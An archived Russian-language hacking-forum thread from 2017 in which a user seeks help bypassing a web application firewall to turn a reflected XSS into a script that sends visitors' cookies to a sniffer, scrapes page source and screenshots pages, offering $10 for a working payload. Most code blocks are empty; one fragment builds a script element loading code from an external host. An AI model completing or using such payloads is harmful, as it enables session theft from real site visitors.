ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Песочница (https://forum.antichat.io/forumdisplay.php?f=189)
-   -   [XSS вектор] Подгрузка JS через . Обход фильтров. (https://forum.antichat.io/showthread.php?t=458116)

Elva 24.11.2017 17:09

Приветствую.

Имеется: XSS вида, https://host.com/parametr?i='/>XSS

Задача

Обойти фильтр и подгрузить js код с хоста https://site.com/, в нем передача cookie на сниффер, парсинг исходного кода страницы и скриншот страницы.

Работает: ,

Фильтр: WAF фильтрует теги указанные ниже, в base64 не отрабатывает.

Код:


Код:

javascript:
Код:

var s = document.createElement('script'); s.src='https://domen.com/1
Код:


Пробовал использовать пейлоады с OWASP, работают практически все html теги, он img до input..

Буду премного благодарен за помощь в написании правильного пайлода с img для исполнения js кода с хоста.

p.s за работоспособное решение оплачу 10$ на кофе

Elva 24.11.2017 18:05

up.сработал

Код:


но его блокирует браузер Opera

crlf 24.11.2017 21:57

Серебрянной пули нет, нужно фантазировать. Например:

Код:




Время: 15:41